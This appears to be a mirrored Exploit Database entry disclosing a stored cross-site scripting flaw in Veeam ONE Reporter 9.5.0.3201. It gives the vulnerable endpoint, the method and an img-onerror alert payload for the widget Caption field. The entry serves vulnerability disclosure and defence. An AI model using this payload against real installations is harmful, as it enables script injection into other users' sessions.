Veeam ONE Reporter 9.5.0.3201 – Persistent Cross-site Scripting (Add/Edit Widget)

• Exploit Database
• 13 阅读

• 作者： Seyed Sadegh Khatami
  日期： 2019-04-30
• 类别：

  • webapps
  平台：

  • ashx
• 来源：https://www.exploit-db.com/exploits/46767/

• # Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
  # Exploit Author: Seyed Sadegh Khatami
  # Website: https://www.cert.ir
  # Date: 2019-04-27
  # Google Dork: N/A
  # Vendor Homepage: https://www.veeam.com/
  # Software Link: https://www.veeam.com/virtual-server-management-one-free.html
  # Version: 9.5.0.3201
  # Tested on: Windows Server 2016
  
  
  #exploit:
  
  Path: /CommonDataHandlerReadOnly.ashx 
  
  method: setDashboardWidget
  
  SET Caption field to “AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”